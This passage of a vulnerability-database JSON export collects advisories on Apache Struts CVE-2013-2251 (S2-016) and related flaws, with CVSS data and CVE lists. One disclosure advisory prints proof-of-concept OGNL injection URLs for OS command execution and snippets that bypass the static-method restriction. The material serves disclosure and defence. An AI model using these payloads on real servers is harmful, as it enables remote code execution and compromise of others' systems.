\n\n\n ## Impact\n\nAn arbitrary command may be executed on the server where Apache Struts resides.\n\n ## Solution\n\n**Apply an Update** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * Apache Struts 2.0.0 through 2.3.15 \n\n", "cvss3": {}, "published": "2013-09-06T00:00:00", "type": "jvn", "title": "JVN#33504150: Apache Struts vulnerable to remote command execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-09-06T00:00:00", "id": "JVN:33504150", "href": "http://jvn.jp/en/jp/JVN33504150/index.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T23:21:13", "description": "Apache Struts 2 is a framework to create Java web applications. Apache Struts 2 contains an arbitrary Java method execution vulnerability due to improper conversion in OGNL expression if a non-string property is contained in action.\n\n ## Impact\n\nIf a remote attacker sends a malformed request parameter to a vulnerable system, an arbitrary Java method may be executed. As a result, information such as environment variables may be disclosed, a denial-of-service (DoS) attack may be conducted, or an arbitrary OS command may be executed.\n\n ## Solution\n\n**Update the Software** \nApply the latest version according to the information provided by the developer. \nThe fix for this issue was contained in Apache Struts 2.2.3.1 released on September 2011. 
\n \nAccording to the developer, Apache Struts 2.0.x is no longer supported, thus it is strongly recommended that users should upgrade to Apache Struts 2.3.x.\n\n ## Products Affected\n\n * Apache Struts versions prior to 2.2.3\n * Apache Struts versions 2.0.x\n", "cvss3": {}, "published": "2012-02-10T00:00:00", "type": "jvn", "title": "JVN#79099262: Apache Struts 2 vulnerable to an arbitrary Java method execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0838"], "modified": "2012-02-10T00:00:00", "id": "JVN:79099262", "href": "http://jvn.jp/en/jp/JVN79099262/index.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nCVE-2013-2251: Apache Archiva Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Archiva 1.3 to Continuum 1.3.6\r\n- The unsupported versions Archiva 1.2 to 1.2.2 are also affected.\r\n\r\nDescription:\r\nApache Archiva is affected by a vulnerability in the version of the Struts library being used, which allows a malicious user to run code on the server remotely. 
More details about the vulnerability can be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Archiva 2.0.1 or Archiva 1.3.8, which are not affected by this issue.\r\n\r\nArchiva 2.0.0 and later is not affected by this issue.\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-04T00:00:00", "title": "[SECURITY] CVE-2013-2251: Apache Archiva Remote Command Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30568", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30568", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\nCVE-2013-2251: Apache Continuum affected by Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Continuum 1.3.1 to Continuum 1.4.1\r\n\r\nDescription:\r\nApache Continuum is affected by a vulnerability in the version of the Struts library being used,\r\nwhich allows a malicious user to run code on the server remotely. 
More details about the vulnerability\r\ncan be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Continuum 1.4.2, which is not affected\r\nby this issue.\r\n\r\nReferences:\r\nhttp://continuum.apache.org/security.html\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-06-14T00:00:00", "title": "[SECURITY] CVE-2013-2251: Apache Continuum affected by Remote Command Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2014-06-14T00:00:00", "id": "SECURITYVULNS:DOC:30825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30825", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:48", "description": "\r\n\r\nCVE Number: CVE-2013-2251\r\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\r\nAffected Software: Apache Struts v2.0.0 - 2.3.15\r\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\r\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\r\nIssue ID by Vender: S2-016\r\n\r\nOverview:\r\n Struts2 is an open-source web application framework for Java.\r\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\r\n leads to arbitrary Java method execution on the target server. This is\r\n caused by insecure handling of prefixed special parameters (action:,\r\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\r\n\r\nDetails:\r\n <About DefaultActionMapper>\r\n\r\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\r\n request and action to be executed on the server. DefaultActionMapper is\r\n a default implementation of ActionMapper. 
It handles four types of\r\n prefixed parameters: action:, redirect:, redirectAction: and method:.\r\n\r\n For example, redirect prefix is used for HTTP redirect.\r\n\r\n Normal redirect prefix usage in JSP:\r\n <s:form action="foo">\r\n ...\r\n <s:submit value="Register"/>\r\n <s:submit name="redirect:http://www.google.com/" value="Cancel"/>\r\n </s:form>\r\n\r\n If the cancel button is clicked, redirection is performed.\r\n\r\n Request URI for redirection:\r\n /foo.action?redirect:http://www.google.com/\r\n\r\n Resopnse Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/\r\n\r\n Usage of other prefixed parameters is similar to redirect.\r\n See Struts2 document for details.\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n <How the Attack Works>\r\n\r\n As stated already, there are four types of prefixed parameters.\r\n\r\n action:, redirect:, redirectAction:, method:\r\n\r\n All except for method: can be used for attacks. But regarding action:,\r\n it can be used only if wildcard mapping is enabled in configuration.\r\n On the one hand, redirect: and redirectAction: are not constrained by\r\n configuration (thus they are convenient for attackers).\r\n\r\n One thing that should be noted is that prefixed parameters are quite\r\n forceful. It means that behavior of application which is not intended\r\n to accept prefixed parameters can also be overwritten by prefixed\r\n parameters added to HTTP request. Therefore all Struts2 applications\r\n that use DefaultActionMapper are vulnerable to the attack.\r\n\r\n The injection point is name of prefixed parameters.\r\n Example of attack using redirect: is shown below.\r\n\r\n Attack URI:\r\n /bar.action?redirect:http://www.google.com/%25{1000-1}\r\n\r\n Response Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/999\r\n\r\n As you can see, expression (1000-1) is evaluated and the result (999)\r\n is appeared in Location response header. 
As I shall explain later,\r\n more complex attacks such as OS command execution is possible too.\r\n\r\n In DefaultActionMapper, name of prefixed parameter is once stored as\r\n ActionMapping object and is later executed as OGNL expression.\r\n Rough method call flow in execution phase is as the following.\r\n\r\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\r\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\r\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\r\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\r\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\r\n\r\nProof of Concept:\r\n <PoC URLs>\r\n\r\n PoC is already disclosed on vender's web page.\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n Below PoC URLs are just quotes from the vender's page.\r\n\r\n Simple Expression:\r\n http://host/struts2-blank/example/X.action?action:%25{3*4}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\n\r\n OS Command Execution:\r\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n\r\n Obviously such attacks are not specific to blank/showcase application,\r\n but all Struts2 based applications may be subject to attacks.\r\n\r\n <OS Command Execution and Static Method Call>\r\n\r\n Another topic that I think worth mentioning is that PoC URLs use\r\n ProcessBuilder class to execute OS commands. 
The merit of using this\r\n class is that it does not require static method to execute OS commands,\r\n while Runtime class does require it.\r\n\r\n As you may know, static method call in OGNL is basically prohibited.\r\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\r\n a simple trick:\r\n\r\n %{#_memberAccess['allowStaticMethodAccess']=true,\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\r\n prevent the trick. However there are still some techniques to call\r\n static method in OGNL.\r\n\r\n One technique is to use reflection to replace static method call to\r\n instance method call. Another technique is to overwrite #_memberAccess\r\n object itself rather than property of the object:\r\n\r\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n Probably prevention against static method is just an additional layer\r\n of defense, but I think that global objects such as #_memberAccess\r\n should be protected from rogue update.\r\n\r\nTimeline:\r\n 2013/06/24 Reported to Struts Security ML\r\n 2013/07/17 Vender announced v2.3.15.1\r\n 2013/08/10 Disclosure of this advisory\r\n\r\nRecommendation:\r\n Immediate upgrade to the latest version is strongly recommended as\r\n active attacks have already been observed. It should be noted that\r\n redirect: and redirectAction: parameters were completely dropped and\r\n do not work in the latest version as stated in the vender's page.\r\n Thus attention for compatibility issues is required for upgrade.\r\n\r\n If you cannot upgrade your Struts2 immediately, filtering (by custom\r\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\r\n this vulnerability. 
Some points about filtering solution are listed\r\n below.\r\n\r\n - Both %{expr} and ${expr} notation can be used for attacks.\r\n - Parameters both in querystring and in request body can be used.\r\n - redirect: and redirectAction: can be used not only for Java method\r\n execution but also for open redirect.\r\n\r\n See S2-017 (CVE-2013-2248) for open redirect issue.\r\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\r\n\r\nReference:\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2013-09-09T00:00:00", "title": "Struts2 Prefixed Parameters OGNL Injection Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2013-09-09T00:00:00", "id": "SECURITYVULNS:DOC:29766", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29766", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:51:29", "description": "Authentication bypass, code execution.", "edition": 2, "cvss3": {}, "published": "2013-10-28T00:00:00", "title": "Cisco Identity Services Engine multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2251", "CVE-2013-5531", "CVE-2013-5530"], "modified": "2013-10-28T00:00:00", "id": "SECURITYVULNS:VULN:13378", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13378", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:37", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-05-04T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": 
"securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-2540", "CVE-2014-1854", "CVE-2014-2729", "CVE-2014-2654", "CVE-2014-2579", "CVE-2014-2736", "CVE-2014-0111", "CVE-2014-2042", "CVE-2014-1907", "CVE-2013-2251", "CVE-2014-2219", "CVE-2014-2340", "CVE-2014-1217", "CVE-2014-1906", "CVE-2014-2737", "CVE-2014-1946", "CVE-2014-1905", "CVE-2014-2983", "CVE-2013-2187", "CVE-2014-2875", "CVE-2014-2383", "CVE-2014-0166", "CVE-2014-1945", "CVE-2014-2024", "CVE-2014-1908", "CVE-2014-1517", "CVE-2014-2715", "CVE-2014-0472", "CVE-2014-1944"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:VULN:13714", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13714", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:48:39", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2013-09-09T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-3214", "CVE-2013-4879", "CVE-2013-1435", "CVE-2013-4998", "CVE-2013-2248", "CVE-2013-4900", "CVE-2013-4160", "CVE-2013-5589", "CVE-2013-4996", "CVE-2013-4152", "CVE-2013-4173", "CVE-2013-2251", "CVE-2013-5588", "CVE-2013-4898", "CVE-2013-4789", "CVE-2013-4880", "CVE-2013-4276", "CVE-2013-4899", "CVE-2013-5003", "CVE-2013-4249", "CVE-2013-4624", "CVE-2013-2136", "CVE-2013-3213", "CVE-2013-4717", "CVE-2013-5216", "CVE-2013-5000", "CVE-2013-1434", "CVE-2013-2653", "CVE-2013-4626", "CVE-2013-3212", "CVE-2013-5002", "CVE-2013-4995", "CVE-2013-3215"], "modified": "2013-09-09T00:00:00", "id": "SECURITYVULNS:VULN:13263", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13263", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2021-06-08T18:45:19", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-06-14T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-3946", "CVE-2014-3781", "CVE-2014-2575", "CVE-2014-3945", "CVE-2014-2987", "CVE-2014-2303", "CVE-2014-3414", "CVE-2014-3947", "CVE-2014-2554", "CVE-2014-3948", "CVE-2014-3944", "CVE-2014-3137", "CVE-2014-3740", "CVE-2013-2251", "CVE-2014-3877", "CVE-2014-3446", "CVE-2014-3943", "CVE-2014-3941", "CVE-2014-3210", "CVE-2014-1402", "CVE-2014-0228", "CVE-2014-3415", "CVE-2014-0130", "CVE-2014-2577", "CVE-2014-3875", "CVE-2014-3942", "CVE-2014-3783", "CVE-2013-7106", "CVE-2014-2233", "CVE-2014-2843", "CVE-2014-3447", "CVE-2013-7107", "CVE-2014-3749", "CVE-2014-0081", "CVE-2014-2232", "CVE-2014-1855", "CVE-2014-1878", "CVE-2014-2302", "CVE-2014-0082", "CVE-2014-3876", "CVE-2014-2553", "CVE-2014-3782", "CVE-2014-2386", "CVE-2014-3966", "CVE-2013-5954", "CVE-2014-0107", "CVE-2014-3448", "CVE-2013-7108", "CVE-2014-2988", "CVE-2014-3445", "CVE-2014-3949"], "modified": "2014-06-14T00:00:00", "id": "SECURITYVULNS:VULN:13836", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13836", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:46:15", "description": "Quarterly update fixes over 130 vulnerabilities in different products.", "edition": 2, "cvss3": {}, "published": "2013-12-09T00:00:00", "title": "Oracle / Sun / MySQL / PeopleSoft applications multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-3792", "CVE-2012-2750", "CVE-2013-5856", "CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5846", "CVE-2013-5818", "CVE-2013-3839", 
"CVE-2013-5779", "CVE-2013-5807", "CVE-2013-4002", "CVE-2013-3831", "CVE-2013-5850", "CVE-2013-3840", "CVE-2013-5778", "CVE-2013-3827", "CVE-2013-3833", "CVE-2013-5867", "CVE-2013-3828", "CVE-2013-3785", "CVE-2013-5862", "CVE-2013-5762", "CVE-2013-3766", "CVE-2013-2172", "CVE-2013-5776", "CVE-2013-5827", "CVE-2013-5788", "CVE-2013-5765", "CVE-2013-5773", "CVE-2013-3841", "CVE-2013-5842", "CVE-2013-2251", "CVE-2013-3836", "CVE-2013-5836", "CVE-2013-5810", "CVE-2013-3762", "CVE-2013-5830", "CVE-2013-5859", "CVE-2013-5832", "CVE-2013-5864", "CVE-2013-5841", "CVE-2013-5845", "CVE-2013-5813", "CVE-2013-3814", "CVE-2013-5763", "CVE-2013-5839", "CVE-2013-5784", "CVE-2013-5792", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-3838", "CVE-2013-5771", "CVE-2011-3389", "CVE-2013-5787", "CVE-2013-3835", "CVE-2013-5852", "CVE-2013-3834", "CVE-2013-5828", "CVE-2013-5854", "CVE-2013-5768", "CVE-2013-5806", "CVE-2013-0149", "CVE-2013-5805", "CVE-2013-5826", "CVE-2013-5857", "CVE-2013-5825", "CVE-2013-5811", "CVE-2013-5789", "CVE-2013-5822", "CVE-2013-5823", "CVE-2013-5837", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5769", "CVE-2013-5865", "CVE-2013-5780", "CVE-2013-3842", "CVE-2013-5761", "CVE-2013-5791", "CVE-2013-5816", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5847", "CVE-2013-5799", "CVE-2013-5814", "CVE-2013-5798", "CVE-2013-5766", "CVE-2013-5775", "CVE-2013-5863", "CVE-2013-5829", "CVE-2013-5786", "CVE-2013-5803", "CVE-2013-5844", "CVE-2013-5796", "CVE-2013-5861", "CVE-2013-5781", "CVE-2013-5835", "CVE-2013-3826", "CVE-2013-5819", "CVE-2013-5770", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5767", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-3832", "CVE-2013-5793", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-3837", "CVE-2013-5838", "CVE-2013-5794", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5866", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772", "CVE-2013-5815"], "modified": "2013-12-09T00:00:00", "id": 
"SECURITYVULNS:VULN:13423", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13423", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:46:15", "description": "Quarterly CPU fixed over 170 different vulnerabilities.", "edition": 2, "cvss3": {}, "published": "2015-07-20T00:00:00", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1926", "CVE-2015-4000", "CVE-2015-2591", "CVE-2015-0443", "CVE-2015-1803", "CVE-2015-4771", "CVE-2015-2627", "CVE-2015-2615", "CVE-2014-3566", "CVE-2015-4764", "CVE-2015-4774", "CVE-2015-2601", "CVE-2015-4738", "CVE-2015-0235", "CVE-2015-4729", "CVE-2015-4751", "CVE-2015-0444", "CVE-2015-0445", "CVE-2015-4749", "CVE-2015-4758", "CVE-2014-7809", "CVE-2015-2643", "CVE-2015-4770", "CVE-2015-4747", "CVE-2015-2661", "CVE-2015-4778", "CVE-2015-2632", "CVE-2015-2625", "CVE-2015-2617", "CVE-2015-4784", "CVE-2015-2664", "CVE-2015-2605", "CVE-2015-2597", "CVE-2015-4785", "CVE-2015-4732", "CVE-2015-2653", "CVE-2014-0227", "CVE-2015-2595", "CVE-2015-4782", "CVE-2015-0286", "CVE-2015-2648", "CVE-2015-2657", "CVE-2014-0230", "CVE-2015-4789", "CVE-2015-0447", "CVE-2015-2581", "CVE-2015-2613", "CVE-2015-2658", "CVE-2014-3571", "CVE-2015-4736", "CVE-2015-2599", "CVE-2013-2251", "CVE-2013-5704", "CVE-2015-4739", "CVE-2015-4790", "CVE-2015-2589", "CVE-2010-1324", "CVE-2015-2623", "CVE-2015-2631", "CVE-2015-2596", "CVE-2015-4763", "CVE-2015-4783", "CVE-2015-2620", "CVE-2015-2650", "CVE-2015-0448", "CVE-2015-2654", "CVE-2015-2607", "CVE-2015-2639", "CVE-2015-2611", "CVE-2015-2645", "CVE-2015-2634", "CVE-2015-2594", "CVE-2015-3456", "CVE-2015-2584", "CVE-2015-2808", "CVE-2014-3570", "CVE-2015-2590", "CVE-2015-2656", "CVE-2015-2626", "CVE-2015-2628", "CVE-2015-4768", "CVE-2015-4761", "CVE-2015-4745", "CVE-2015-4750", "CVE-2015-2635", "CVE-2015-4756", 
"CVE-2015-2647", "CVE-2015-2600", "CVE-2015-2580", "CVE-2015-3152", "CVE-2015-2640", "CVE-2015-4733", "CVE-2015-2646", "CVE-2014-1568", "CVE-2015-2651", "CVE-2015-2603", "CVE-2015-2633", "CVE-2015-4765", "CVE-2015-2660", "CVE-2015-2604", "CVE-2015-0255", "CVE-2015-4772", "CVE-2015-2662", "CVE-2015-4735", "CVE-2015-4779", "CVE-2015-2585", "CVE-2013-2186", "CVE-2014-3567", "CVE-2015-2614", "CVE-2015-4766", "CVE-2015-4737", "CVE-2015-4776", "CVE-2015-4757", "CVE-2015-4728", "CVE-2015-2637", "CVE-2015-2606", "CVE-2015-4769", "CVE-2015-2621", "CVE-2015-4786", "CVE-2015-4787", "CVE-2015-2638", "CVE-2015-4740", "CVE-2015-2619", "CVE-2015-4731", "CVE-2015-4727", "CVE-2015-4741", "CVE-2015-2636", "CVE-2015-2659", "CVE-2015-2655", "CVE-2015-4775", "CVE-2015-4773", "CVE-2014-8102", "CVE-2015-4746", "CVE-2015-2629", "CVE-2015-4788", "CVE-2015-4755", "CVE-2015-2602", "CVE-2015-4748", "CVE-2015-2622", "CVE-2015-2610", "CVE-2012-0036", "CVE-2015-2663", "CVE-2015-4742", "CVE-2015-2652", "CVE-2015-4759", "CVE-2015-0446", "CVE-2015-2582", "CVE-2015-4780", "CVE-2014-1569", "CVE-2015-4781", "CVE-2015-2618", "CVE-2015-2641", "CVE-2015-2593", "CVE-2015-4744", "CVE-2015-2598", "CVE-2015-2587", "CVE-2015-2630", "CVE-2015-2592", "CVE-2015-4767", "CVE-2015-2616", "CVE-2015-2624", "CVE-2015-2609", "CVE-2015-4777", "CVE-2015-4754", "CVE-2015-2588", "CVE-2015-4760", "CVE-2015-2583", "CVE-2015-4743", "CVE-2015-4752", "CVE-2015-2586", "CVE-2015-4753", "CVE-2015-2649", "CVE-2015-2612", "CVE-2015-2644"], "modified": "2015-07-20T00:00:00", "id": "SECURITYVULNS:VULN:14601", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14601", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2022-06-05T10:04:30", "description": "Multiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote command execution vulnerability. 
\n\nThe vulnerability is due to insufficient sanitization of user-supplied\ninput. An attacker could exploit this vulnerability by sending crafted requests\nconsisting of Object-Graph Navigation Language (OGNL) expressions to an affected system. An\nexploit could allow the attacker to execute arbitrary code on the targeted system. \n\nCisco has released software updates that address this vulnerability for all the affected products except Cisco Business Edition 3000. Cisco Business Edition 3000 customers should contact their Cisco representative for available options.\n\nWorkarounds that mitigate this vulnerability are not available.\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2\"]", "cvss3": {}, "published": "2013-10-23T16:00:00", "type": "cisco", "title": "Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2015-10-12T12:30:00", "id": "CISCO-SA-20131023-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-05T10:05:05", "description": "Multiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote 
command execution vulnerability identified by Apache with Common Vulnerabilities and Exposures ID CVE-2010-1870.\n\nThe vulnerability is due to insufficient sanitization on user-supplied input in the XWorks component of the affected software. The component uses the ParameterInterceptors directive to parse the Object-Graph Navigation Language (OGNL) expressions that are implemented via a whitelist feature. An attacker could exploit this vulnerability by sending crafted requests that contain OGNL expressions to an affected system. An exploit could allow the attacker to execute arbitrary code on the targeted system.\n\nCisco has released software updates that address this vulnerability for all the affected products except Cisco Business Edition 3000 Series. Customers using Cisco Business Edition 3000 Series should contact their Cisco representative for available options.\n\nCisco has released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available. 
This advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140709-struts2 [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140709-struts2\"]", "cvss3": {}, "published": "2014-07-09T16:00:00", "type": "cisco", "title": "Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2014-12-17T18:47:00", "id": "CISCO-SA-20140709-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140709-struts2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "canvas": [{"lastseen": "2021-07-28T14:33:39", "description": "**Name**| struts2_default_action_mapper \n---|--- \n**CVE**| CVE-2013-2251 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Apache Struts 2.0.0 - 2.3.15 RCE \n**Notes**| References: https://cwiki.apache.org/confluence/display/WW/S2-016 \nRepeatability: Infinite \nVENDOR: Apache \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251 \nCVE Name: CVE-2013-2251 \n\n", "edition": 3, "cvss3": {}, "published": "2013-07-20T03:37:00", "title": "Immunity Canvas: STRUTS2_DEFAULT_ACTION_MAPPER", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
